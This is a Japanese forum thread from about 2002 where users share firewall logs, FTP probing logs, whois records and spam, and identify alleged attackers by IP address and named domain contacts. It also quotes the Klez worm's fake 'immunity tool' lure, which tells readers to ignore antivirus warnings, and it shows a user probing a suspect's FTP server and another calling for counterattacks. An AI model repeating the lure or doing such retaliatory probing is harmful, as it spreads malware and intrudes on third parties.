不正アクセス解析スレ

前スレから独立
不正アクセス晒しコーナー
http://pc.2ch.net/test/read.cgi/sec/999961746

サラす場合、アドレス・時刻・手口と詳細に書いてね。

株式会社キタムラ（http://www.kitamura.co.jp）
からsshdに対して不正アクセスがありました。
IPアドレスは、210.157.240.220
時間は今日の朝６時前後で、
攻撃内容は、crc32 compensation attack
です。
このドメインの登録担当者・技術連絡担当者は、
大瀧 敏司（TO139JP）です。
株式会社キタムラから、犯罪者が出ないことを祈ります。
あーめん

良スレの予感

踏み台だろ、連絡してやれ。

なんだ？？
盗撮の他に、クラックでもやろうってか。

61.198.116.176
なんだか知らんがさっきから6699を執拗にポートスキャンしてくる。
6699って何かあるの？

>>6
MX

MXって？

>>8
http://tmp.2ch.net/download/

何かのソフトかな？使ってないからわがんね！

>>10
おまえみたいな厨房にはネット初心者板が、お・に・あ・い♪

>>10 田植は終わったか？

>>1-3 ってｼﾞｻｸｼﾞｴｰﾝ ?

>>13
俺>>3だよ。

とうとう、ルーターの中に進入されちまった・・・ (＞＜）
それ以来ずっと勧告系に毎日やられちゃってます 。(＞＜）
今のところＰＣには異常は無いけど、異常は時間の問題だ。。
韓国に対して宣戦布告しる！ 210系を一斉攻撃しちゃる！！

>>15
ルーターの中に進入ってどういう意味？ルーターが外部からのおかしなパケットを
ブロックしただけじゃないの？そんなものなら毎日のように来てるけど。それと、
210は日本も使ってるから相手を間違えないようにね。

>>15
ねえねえ、書くなら>>2みたいに書こうよ。

チャバネゴキブリがルータに進入しました。どうしたらよいでしょう。

>>18
ルータを水につけてゴキブリを溺れさせる。

>>15
このスレも君のような厨房に侵入されてしまった。
今のところスレには異常は無いけど、異常は時間の問題だ。。

61.201.80.12
133.11.85.12
うぜえ・・・

まあ、せっかくの良スレの予感がこんなになるのもありだな。
細かいことをいうと、
sendmailでどのコマンドが使えるか接続したり、
ftpdを公開してないのに、調べてわざわざ何度も接続したり、
sshdだったり、
telnetdだったり
あげればきりがない。
ちなみに俺が管理してるサーバで、
jpドメインとcomドメインしか相手にしてない
設定にしてるのがある。
だって日本語ページだから見なくていいでしょ？

>>21
だから>>2みたいに書けよ。
おめえの方がうぜえ・・・

>>23
（´∀｀　）おまえもなー

IP: 61.195.26.229
DNS: PPPa101.miyazaki-ip.dti.ne.jp
ここからDOS攻撃されてるようです
（知識ないのでわからないですが）
6時51分40秒から試行されています。

システムの応答不可がいつも以上です。
ICMPっていうのかな。。。

>>2
俺全然知らんけどどうやって調べたの？

>>22
netドメインは見れないのか・・・ボソ。

>>26
おまえみたいな厨房にはネット初心者板が、お・に・あ・い♪

Received:from218-42-149-3.cust.bit-drive.ne.jp(EHLOmail1) (218.42.149.3) by 64.152.22.93,**　Received: from [192.168.1.7] by mail1 (ArGoSoft Mail Server Pro for WinNT/2000, Version1.01(1.2.3)
To: [email protected] [email protected] [email protected]
[email protected] [email protected]
[email protected] Message-ID:< [email protected] >
Date**From:MELAD< [email protected] >
Subject:★世直し 平成の水戸黄門 世論調査★
MIME-Version:1.0X-Mail-Agent:BSMTP DLL Sep 32 3001 by Tatsuo Baba
Content-Type:text/plain; charset="ISO-2022-JP"
PUBLIC OPINION POLL OF JAPAN
正しい世論を喚起し明るく豊かな新しい日本を創造する
世直し 平成の水戸黄門 世論調査 にご協力をお願い致します。
■■■■■■■■■■■ 週　刊　世　論　調　査 ■■■■■■■■■■■ 　　　　　　構造改革、規制緩和のお手本、郵政民営化が
　　　与野党破廉恥郵政族議員によって骨抜きにされつつある
　　　　　業界参入をほとんど不可能にする制度策定を狙い
　　　　　　財務省、外務省、元郵政省３大権益権力の温存暴走を許す
　　「くろねこヤマトに10万個のポスト」を、破廉恥郵政族議員は完全に葬る
べきだ
下記のアドレスにて,賛成・反対の回答にご協力お願い致します。
http://www.melad.jp/[email protected]&pmd=ml&pno=5&m_ml_id=1234567
■■■■■■■■■■ 内 閣 支 持 率 世 論 調 査 ■■■■■■■■■■ ■ あなたは小泉内閣を支持しますか!

　　下記のアドレスにて,支持する・しないの回答にご協力をお願い致します。
http://www.melad.jp/[email protected]&pmd=ml&pno=5&m_ml_id=7895248
■■■■■■■■■■ 政 党 支 持 率 世 論 調 査 ■■■■■■■■■■ ■ あなたは今どの政党を支持なさいますか？
　　自民党・民主党・公明党・自由党・保守党・社民党・共産党・無党派
　　下記のアドレスにて回答にご協力お願い致します。
http://www.melad.jp/[email protected]&pmd=ml&pno=5&m_ml_id=2597832
■■■■■■■■■■ 世直し 平成の水戸黄門 世論調査 ■■■■■■■■■■ ■ ☆☆☆☆☆☆☆☆　PUBLIC OPINION POLL OF JAPAN　☆☆☆☆☆☆☆☆☆☆ 〒110-0015　東京都台東区東上野 ３−２８−４
TEL　＊＊　FAX　＊＊
☆☆☆☆☆☆☆☆ 企画編集兼発行責任者　 奥 田 弥 生 ☆☆☆☆☆☆☆☆ 会員番号1873084番　メール発信管理番号XYZ-207830182　番
■■■■■■■■■■■■　友人ご紹介のお願い。　■■■■■■■■■■■■ 　 世直し平成の水戸黄門の輪を広げ
　政治に対する正しい世論を巻き起こし本来の政治体制に復帰させるため 一人でも多くの方に会員参加をお勧めくださるようお願いします
http://www.melad.jp/[email protected]&pmd=ml&pno=5&m_ml_id=2597830
　上記のリンクをクリックした頂ければ友人ご紹介のページにリンクします 何卒宜しくお願い致します。
■■■　配信停止のお手続きはお手数でもこちらのページからお願い致します。 　　http://melad.jp/[email protected]
　上記のリンクをクリックした頂ければ自動的に配信停止処理が行われます 何卒宜しくお願い致します、ご協力有り難う御座いました。

DOS kougeki nara ripana hanzai.
kaki no kanrisha ni mail shiyou.
sosite kougekisha wo tokutei surunoda!!

[ JPNIC & JPRS database provides information on network administration. Its ]
[ use is restricted to network administration purposes. For further infor- ]
[ mation, use 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, ]
[ add'/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.195.0.0-61.195.31.0
b. [ネットワーク名] DTI-NET
f. [組織名] 株式会社 ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET INC.
m. [運用責任者] ST3000JP
n. [技術連絡担当者] TS8661JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/08/09
[返却年月日]
[最終更新] 2001/08/09 12:13:01 (JST)
[email protected]

>>25 ne.

>>25
DOS攻撃に間違いないの？ICMPとは意味が違うよ？

このスレ的には>>25は放置が正しい。

May 4 22:13:21 hoge in.ftpd[21795]: refused connect from pD950191D.dip.t-dialin.net

私に対して不正アクセスしたやつら
種類,時刻,受信/送信,ﾌﾟﾛﾄｺﾙ,送信元IPｱﾄﾞﾚｽ,送信元ﾎﾟｰﾄ
ﾌｧｲｱｳｫｰﾙ,00:28:38,受信,ICMP,210.154.182.25,
ｸﾛｰｷﾝｸﾞ,00:44:19,受信,TCP,210.3.53.254,3096,210.,
ｸﾛｰｷﾝｸﾞ,00:44:22,受信,TCP,210.3.53.254,3096,
ﾌｧｲｱｳｫｰﾙ,23:18:22,受信,ICMP,211.14.218.150,
ﾌｧｲｱｳｫｰﾙ,23:18:44,受信,ICMP,218.121.216.32,
ﾌｧｲｱｳｫｰﾙ,23:28:12,受信,ICMP,210.128.228.106,
ﾌｧｲｱｳｫｰﾙ,23:29:35,受信,ICMP,218.41.179.228,

Klez.E is the most common world-wide spreading worm.It's very dangerous by corrupting your files.
Because of its very smart stealth and anti-anti-virus technic,most common AV software can't detect or clean it.
We developed this free immunity tool to defeat the malicious virus.
You only need to run this tool once,and then Klez will never come into your PC.
NOTE: Because this tool acts as a fake Klez to fool the real worm,some AV monitor maybe cry when you run it.
If so,Ignore the warning,and select 'continue'.
If you have any question,please mail to me.

　

見事に>>3の予感は外れて糞スレになっているな。

>>38
はい>>3です。
とても残念です。
悲しくて悲しくて仕方ありません。

ここも出だしは良かったんだけどねぇ。
やっぱりコピペ用に晒しコーナーPart2立てようか。

133.8.123.10,fmpro-http をﾌﾞﾛｯｸしました｡ 詳細:
ｱｳﾄﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 218-42-149-3.cust.bit-drive.ne.jp,2999
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 133.8.123.10,fmpro-http
ﾌﾟﾛｾｽ名は C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
a. [IPネットワークアドレス] 133.8.0.0
b. [ネットワーク名] GUNMA-U
f. [組織名] 群馬大学

>>41 君ったら...

>>41
君自身が不正なんだね。

>>30みたいに調べるにはどのサイト行けばいいですか？

>>44
日本国内ならここ。
http://www.nic.ad.jp/ja/whois/index.html
海外も含めて検索する場合はここ。
http://www.mse.co.jp/ip_domain/
ただし、出てきた結果をそのまま掲示板に貼り付けるようなことはしないように。

パターン1

pD90162EC.dip.t-dialin.net UNKNOWN ftp [25/Apr/2002:01:46:14 +0900] "CWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp" 550 -

パターン2

pD90162EC.dip.t-dialin.net UNKNOWN ftp [25/Apr/2002:09:26:47 +0900] "STOR /incoming/1mbtest.ptf" 226 1048578

1MB書き込みできることの確認?
他に1kbtest.ptfもあり。

パターン3

pD90162EC.dip.t-dialin.net UNKNOWN ftp [25/Apr/2002:09:27:30 +0900] "STOR /incoming/space.asp" 226 2580

その後、http://???.???.???/incoming/space.aspをGET

パターン4

adsl-66-141-144-10.dsl.hstntx.swbell.net UNKNOWN ftp [25/Apr/2002:17:20:23 +0900] "MKD _kurdt" 550 -
adsl-66-141-144-10.dsl.hstntx.swbell.net UNKNOWN ftp [25/Apr/2002:17:20:24 +0900] "PWD " 257 -
adsl-66-141-144-10.dsl.hstntx.swbell.net UNKNOWN ftp [25/Apr/2002:17:20:24 +0900] "CWD upload" 550 -

_kurdtを作成し、PWDし、(書き込めそうなパスに)CWDする。

パターン5

adsl-66-141-144-10.dsl.hstntx.swbell.net UNKNOWN ftp [25/Apr/2002:22:50:05 +0900] "CWD /C:/-=WaReZ=-/-=GaMeZ=-/-=AliEnS VS PReDaT
oRS 2/CD2" 550 -

プレデター?

パターン6

p5083F4C2.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:02:38:28 +0900] "CWD /incoming/785124896/.lastFile/.stayout/.upped_for_STS-Bo
ard/" 550 -

ステータスボード?

パターン7

pD9E6632A.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:03:01:16 +0900] "CWD /incoming/tagged_by_etgar/by/etgar/for/pong/com1/filled/
by/com2/incoming/pub/lpt" 250 -

これも多い。

パターン7b

pD9E6632A.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:03:17:43 +0900] "MKD <FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF>
<FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF>chafft<FF>" 257 -
pD9E6632A.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:03:17:44 +0900] "PORT 217,230,99,42,19,140" 200 -
pD9E6632A.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:03:17:45 +0900] "LIST " 226 101
pD9E6632A.dip.t-dialin.net UNKNOWN nobody [26/Apr/2002:03:18:59 +0900] "USER anonymous" 331 -
pD9E6632A.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:03:18:59 +0900] "PASS [email protected]" 230 -
pD9E6632A.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:03:19:00 +0900] "SYST " 215 -
pD9E6632A.dip.t-dialin.net UNKNOWN ftp [26/Apr/2002:03:19:00 +0900] "CWD /incoming/tagged_by_etgar/by/etgar/for/pong/com1/filled/
by/com2/incoming/pub/lpt/est/<FF><FF><FF><FF>
<FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF>
<FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF><FF>chafft<FF>" 550 -

パターン7の変形版。

パターン8

212.199.225.5 UNKNOWN ftp [30/Apr/2002:17:04:46 +0900] "MKD / / /_/94789b29294b412bdfd1f9bb4ba665eacf8b07020e1a3062c489ed25b691df
437a085da752a7007b2c/" 550 -
212.199.225.5 UNKNOWN ftp [30/Apr/2002:17:05:00 +0900] "MKD /tmp/ /_core-1160746991/ /For DivX Club/ /For DivxClub/Tagged by alxx
l/" 550 -
212.199.225.5 UNKNOWN ftp [30/Apr/2002:17:05:01 +0900] "CWD /tmp/ /_core-1160746991/ /For DivX Club/ /For DivxClub/Tagged by alxx
l/" 550 -

同じIPだから纏めて。/tmpの部分を何パターンか変えてきた。

パターン9

cs66692-85.satx.rr.com UNKNOWN ftp [01/May/2002:00:57:25 +0900] "SIZE -[- 00200 -]-" 550 -
cs66692-85.satx.rr.com UNKNOWN ftp [01/May/2002:00:57:25 +0900] "PORT 66,69,2,85,6,87" 200 -
cs66692-85.satx.rr.com UNKNOWN ftp [01/May/2002:00:57:30 +0900] "STOR -[- 00200 -]-" 450 -

Winっぽくないので一番薄気味悪かった。

おい、お前ら、
何か思い当たるフシがあったら教えてください。
俺のマシンがWinだったらやられてましたか?
いっぱい書き込んでしまってごめんなさい。

>>56
ブッコするよ
まじ
電話しれ

おっ いい感じになってきた。
>>48のspace.aspって中身どっかに貼ってあったっけ?

資料張っとく
http://www.sans.org/y2k/030901.htm

最近、中国からの80ポートへのアクセスが非常に多いです。
ルーターのログ機能からポート80がたくさん検出されました。
ステルス機能が活かされていないのかも知れません。。はぁ−。

>>60
あんたステルスの意味わかってないようだね。出直しといで。

>>48はhttp://grimsping.cjb.net/downloads.htmのPing Companionで使えるディスク容量探ってるのか。

ここにそれらのファイルが晒されているぞ。
http://mediin.com/upload/
space.aspもある。　スクリプト。

>>63
ドライブの情報表示するだけみたいだね。裏口は作らない。

>>60
そんなに心配なら
ステルスを増設してみたらどうだろうか？

t-dialin.netってなんだろうね。
うちもftpへのアクセスが多い。
全部けるけどね。

ログにあった210.82.192.159へ何となく飛んでみたら
HPへ行けた。(普通は繋がらないと思っていましたが）
http://210.82.192.159/

それと何処か勉強できるサイトは無いですかね？
>>61氏などが言うように、自分には勉強が必要だと感じました。
ルータのログには毎日10個ぐらいの数字が検出されるんですが
これらの意味などを基本から勉強したいです。覚えたいんです。

>>67 そういう輩の所には不用意にアクセスしない方がいいよ。
　　変なのに感染してたら（特に新種だったりしたら）ヤバイよ。

>>48 からの一連のやつを解析しろな。　まとめるだけでもいいからよ。
　　　　そういうスレなんだろここは　>>1

>>69
もうちょい待ってろ。
GW厨いなくなったらな。

>>43
説明を!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 218-42-149-3.cust.bit-drive.ne.jp,2999
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 133.8.123.10,fmpro-http
ﾌﾟﾛｾｽ名は C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
a. [IPネットワークアドレス] 133.8.0.0
b. [ネットワーク名] GUNMA-U
f. [組織名] 群馬大学

>>71 まあ、心配するなって事よ。　あと、ちみはネットワークに繋がった
　　　PCは使わない方が脳内の活性酸素濃度も抑えられていいんじゃないか
　　　とおもいまち。

>>71
説明って>>43の？

>>71
ここはお勉強スレじゃないので、話題に加われない奴は黙って見てるだけにしなさい。

>>71
＞ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 133.8.123.10,fmpro-http
んで
＞a. [IPネットワークアドレス] 133.8.0.0

二重にバカですな。
ＧＷ期間中ネットの勉強でもしとけ。

>>72
まあ、心配するなって事よ。　あと、ちみはネットワークに繋がった
PCは使わない方が脳内の活性酸素濃度も抑えられていいんじゃないか
とおもいまち

>>74
ここはお勉強スレじゃないので、話題に加われない奴は黙って見てるだけにしなさい。

>>75
二重にバカですな。
−−−−−−−−−−−
結局説明できないアフォばかりということで。

このスレのFTPのログってさ、何かのExploitなんだろうけど。
何なんだろうか。

ここで訊いていいのか分かりませんが、ある掲示板で誹謗中傷を繰り返す者のＩＰです。

どうにかならないでしょうか。

fwisp10-ext-y.docomo.ne.jp

>>78
docomoに連絡しれ。
本気で追い込むなら、訴訟を視野に入れているって連絡して。
なおそれって、IPでもIPアドレスでもなく、リモートホストです。

>>79
ありがとうございます。何度通報すると言っても効果が無いので。
今も荒らし続けています。
連絡してみます。

>>76
＞結局説明できないアフォばかりということで。

説明以前の問題ってわかってないの？きみ。

＞ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 133.8.123.10,fmpro-http

ってあんた、わかって書いてるのか？？

>>81
嵐は放置という事でおながいします。

ファイアーウォールで攻撃されましたとの表示。
ＩＰは211.244.9.132なのですが、こいつは放置しておいて大丈夫？

>>83 どんな攻撃をされたか分からないんだけど
　　どうせ韓国の感染アフォからだと思うから放置で
　　いいんじゃないのか

>83
IPアドレス晒すだけじゃなくて、具体的にどんな攻撃があったのか書いてよ。
それだけでは、わかんないです。

83です。
>>84ありがとう、放置しておきます。
>>85こんなメッセージがでたんです。
当方ノートン・パーソナル・ファイアーウォールです。
規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 のｾｷｭﾘﾃｨ警告を表示しました
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ (211.244.9.132､ 1605)

暇な福岡人へ。
人のPCをリモートしようとしてんじゃねーよ！　
IP: 61.207.252.217
DNS: p3217-ipad03fukuokachu.fukuoka.ocn.ne.jp
因みに時間は5/7　1：34

>>87
リモートって、どうやって？
そっちを知りたいなり〜

>>83
そういう事はノートンスレで聞け。
もっともあっちでもそんな糞質問したらアンインスコしろといわれるだろうが。

こいつ↓もリモート

日付：2000/05/06 時刻： 23：57：48
規則「暗黙のﾌﾞﾛｯｸ規制」が cj3172439-a,microsoft-ds を遮断しました。詳細：
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは cj3172439-a,microsoft-ds
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 203.165.218.138,4508
ﾌﾟﾛｾｽ名は N/A

６４．９４．８９．２４５
我のPCへの攻撃をやめよ。
大栄手い国特務機関がテロを撲殺する。
あと、ハッカーは犯罪なり。

より正確に言うと、リモートアクセス出来るかどうかを試してきた。
正直2〜3日に一回は検出される程度のものだけど・・・　　って、>>88はこのスレの住人のくせにリモートされる条件も知らんのか？

>92

それは八つ当たりというもの

>>92
いや、どんな答えが返ってくるかと思ってさ

FWの遮断ログなんぞ嬉しそうに貼るなよ。なんの役にも立たない。

今日中国から３回
　　　韓国から１回

>>96
（♯｀Д´）上げるんじゃねーよ！貼り付け厨が来るだろがっ！

>>97
おまえのことですか？

>>94
おまえみたいなヴァカは、とりあえず首でも吊っておけ！(ｹｯ!

掲示板とかにメアドを入れないで書き込んでも、メアドが相手に解ってしまうことってあるんですか？
IPからメールアドレスや個人情報が簡単にわかるんでしょうか？
掲示板管理者には、接続プロバイダやIPがわかるのでしょうか？
最近、知らない人からのメールが沢山来て困っています。どなたか教えてください。

>>96 ほらみれ、わけ和漢ねーのがきちまったじゃねーか。 ヴォケが!
>>97 あんた、このスレなに話してるか判ってんの?

>>101
君のようなわけのわからんＤＱＮが居座っちまったな・・・

朝の５時から１０分に２回ほどゾーンアラームの警告が出る・・
全部コイツ。
Name: 101.50.ultimate-int.uia.net
Address: 66.146.50.101
何者なんだよ・・・

ルータにかなりプライベートアドレス宛のパケットがありますた

211.198.190.18（韓国）
３０分で３１９回アタックされた
まだ増えてるみたい
俺が何をしたー！！

＞１０５
ﾜﾗﾀ
>>103の人？違うか？

Name: jpc022.jomon.ne.jp
Address: 211.120.122.22

FWIN,2002/05/09,18:15:04 +9:00 GMT,211.120.122.22:1090,XXX.XX.XXX.XXX:137,UDP
FWIN,2002/05/09,18:15:49 +9:00 GMT,211.120.122.22:1090,XXX.XX.XXX.XXX:137,UDP
FWIN,2002/05/09,18:16:24 +9:00 GMT,211.120.122.22:1090,XXX.XX.XXX.XXX:137,UDP
FWIN,2002/05/09,18:18:17 +9:00 GMT,211.120.122.22:1090,XXX.XX.XXX.XXX:137,UDP
FWIN,2002/05/09,18:40:16 +9:00 GMT,211.120.122.22:1533,XXX.XX.XXX.XXX:137,UDP
FWIN,2002/05/09,19:16:40 +9:00 GMT,211.120.122.22:1533,XXX.XX.XXX.XXX:137,UDP
FWIN,2002/05/09,19:36:57 +9:00 GMT,211.120.122.22:1533,XXX.XX.XXX.XXX:137,UDP

>>100
メールで聞くといい
どこかにメアドを晒された可能性もあるYO

種類 |時刻 |受信/送信|ﾌﾟﾛﾄｺﾙ |送信元IPｱﾄﾞﾚｽ |送信元ﾎﾟｰﾄ |説明|
ｸﾛｰｷﾝｸﾞ |15:39:05 |受信 |TCP |210.127.240.78 |2157 　　　　　　|Cloaking|
ｸﾛｰｷﾝｸﾞ |18:24:27 |受信 |TCP |61.175.133.30 |1793 　　　　　　|Cloaking|
ｸﾛｰｷﾝｸﾞ |18:24:30 |受信 |TCP |61.175.133.30 |1793 　　　　　　|Cloaking|
ｸﾛｰｷﾝｸﾞ |18:24:36 |受信 |TCP |61.175.133.30 |1793 　　　　　　|Cloaking|
ｸﾛｰｷﾝｸﾞ |21:57:50 |受信 |TCP |202.121.96.13 |2471 　　　　　　|Cloaking|
ｸﾛｰｷﾝｸﾞ |21:57:53 |受信 |TCP |202.121.96.13 |2471 　..＿＿＿|Cloaking|＿＿
ﾌｧｲｱｳｫｰﾙ|22:24:13 |受信 |UDP |210.200.244.107 |137 　　|NetBIOS Browsing|
ﾌｧｲｱｳｫｰﾙ|22:24:14 |受信 |UDP |210.200.244.107 |137 　　|NetBIOS Browsing|
ﾌｧｲｱｳｫｰﾙ|22:24:16 |受信 |UDP |210.200.244.107 |137 　　|NetBIOS Browsing|
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣

>>109 これって何のログなの？

>>109バスターのログ

>>111 そうですか。　ところで、Cloakingってバスター様のヘルプではどう
書いてあるのでしょうか？

「クローキングによるアクセス制限」機能では、お使いのコンピュータから要求されたアクセスに対する応答のみを受信し、それ以外のアクセスをすべて「不正アクセス」として制限します。
ネットワーク上のデータの送受信が制限されるわけではありませんので、インターネットへの接続やデータのダウンロードは通常通り実行されます。
ウイルスバスター2002のパーソナルファイアウォールがブロックした不正アクセスの情報は、パーソナルファイアウォールログで確認することができます。

24.53.124.19
61.201.220.22
213.46.45.109
さっきから、同時多発に6699をｱﾀｯｸしてきてうるさいです。

>>114 それは、少し前まで君が盛んに6699を使ってたからだと思うな。

未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 210.169.233.194,auth

−−−−−−−−−−−−−−−−−−−−−−
２２時半前後の話だが、１０分程度の間で１３７回もくらったよ。
ログ見るまで気付かなかった。


ここね。
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.169.233.192/28
b. [ネットワーク名] NRIDATA-NET
f. [組織名] エヌ・アール・アイデータサービス株式会社
g. [Organization] NRI Data Services,Ltd.
m. [運用責任者] KS1824JP
n. [技術連絡担当者] OK106JP
y. [通知アドレス] [email protected]

>>113 ありがとう。　勉強になりました。

>>116

C:\>ftp 210.169.233.194
Connected to 210.169.233.194.
220 nsitsrv.nridata.co.jp FTP server ready.
User (210.169.233.194:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
d--x--x--x 2 0 0 1024 Feb 29 2000 bin
d--x--x--x 2 0 0 1024 Feb 29 2000 etc
drwxr-xr-x 2 0 0 1024 Feb 29 2000 lib
drwxr-sr-x 2 0 50 1024 Nov 25 1999 pub
226 Transfer complete.
ftp: 249 bytes received in 0.03Seconds 8.03Kbytes/sec.
ftp> bye
221-You have transferred 0 bytes in 0 files.
221-Total traffic for this session was 623 bytes in 1 transfers.
221-Thank you for using the FTP service on nsitsrv.nridata.co.jp.
221 Goodbye.

C:\>

insuite.nridata.co.jp (pri=10)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。

--------------------------------------------------------------------------------

失敗： メールサーバーに接続できませんでした。

218-42-149-3.cust.bit-drive.ne.jp,auth をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 218-42-149-3.cust.bit-drive.ne.jp,auth
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは www.nridata.co.jp,3901
ﾌﾟﾛｾｽ名は N/A

>>118
(´-`).｡oO(pubにおもしろいものあるかなぁ？・・・)

>>121　坊ちゃん、自分で見に行けるよ３歳だもん。

(´-`).｡oO(行ってたいしたものなかったら馬鹿らしいなぁ・・・)

>>123 俺もそう思って書いて見たがバレタか。　はははははははは
はははははははははははははははははははは...蝙蝠......黄金..

>124
イタ過ぎだ、この野郎！

なんか今日(11日)は韓国IPからのアクセスがいつもの１０倍ほどあった。

jp.f2.mail.yahoo.co.jp,http をﾌﾞﾛｯｸしました｡ 詳細:
ｱｳﾄﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 160.197.49.212,1530
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは jp.f2.mail.yahoo.co.jp,http
ﾌﾟﾛｾｽ名は �ﾊ1ﾔ�ﾊ1ﾔ

ﾌﾟﾛｾｽ名が文字化けで解らない。

>>127
チョン語だったり

最近ポートスキャン多くないですか?

>>127
感染してるのかな

>>129
昨日は多かった。

>127
君が直前に、Yahooメールでもみてたんじゃないの？

versions.divx.com,http をﾌﾞﾛｯｸしました｡ 詳細:
ｱｳﾄﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは localhost,1026
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは versions.divx.com,http
ﾌﾟﾛｾｽ名は C:\PROGRAM FILES\DIVX\DIVX PLAYER 2.0 ALPHA\DIVX PLAYER 2.0 ALPHA.EXE

最近Port14をよくツンツンされるんだが
新種のトロイ用ポートなんか？

未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 218.216.83.241,auth(113)

↑まあ、よくある警告なんだが、
今日のコイツはしつこくて、45分間のうちに一人で163回も突っついてきやがった。
俺はダイヤルアップで接続の度にIP変わるのだが、なんか俺に恨みでもあんのか？？

192.168.0.1
不正アクセスの種類　トレースレート

この人はよく私のＰＣにアクセスしてきたＦＷが作動します。
その度に回線が切断してしまうので腹が立ちます。
何が目的なのかよく分かりませんが、やめてほしいです。

不正アクセス━━━━！！！

>>136
( ･∀･)ﾜﾗﾀ！

>>133
不正アクセスじゃねーじゃん

inetnum: 61.56.0.0 - 61.67.255.255
netname: TWNIC-TW
descr: Taiwan Network Information Center
descr: 4F-2, No. 9 Section 2, Roosevelt Road,
descr: Taipei, Taiwan, R.O.C.
country: TW
admin-c: SO12-AP
tech-c: NS10-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-TW-TWNIC
changed: [email protected] 20010221
source: APNIC

person: Shih-Chiung Ouyang
address: Taiwan Network Information Center
address: 4F-2, No. 9 Sec. 2, Roosevelt Rd.,
address: Taipei, Taiwan, 100
country: TW
phone: +886 2 2341 1313 ext. 301
fax-no: +886 2 2396 8832
e-mail: [email protected]
nic-hdl: SO12-AP
notify: [email protected]
mnt-by: MAINT-TW-TWNIC
changed: [email protected] 20000808
source: APNIC

person: Nai-Wen Shui
address: Taiwan Network Information Center
address: 4F-2, No. 9 Sec. 2, Roosevelt Rd.,
address: Taipei, Taiwan, 100
country: TW
phone: +886 2 2341 1313 ext. 500
fax-no: +886 2 2396 8832
e-mail: [email protected]
nic-hdl: NS10-AP
notify: [email protected]
mnt-by: MAINT-TW-TWNIC
changed: [email protected] 20000808
source: APNIC

From:AmericanHomeownersAssociation< [email protected] >
To: Subject:Friend,HereAreYour2FREEAirlineTickets
Date**
Received:from[216.242.142.56]by *.com with ESMTP id **
Received:from a (216.242.142.54)bylsmail7.oin-1.com
(LSMTP for Windows NT v1.1b) with SMTP id **
From [email protected]
This email is not sent unsolicited. This is an Opt-In Network mailing!
This message is sent to subscribers ONLY.
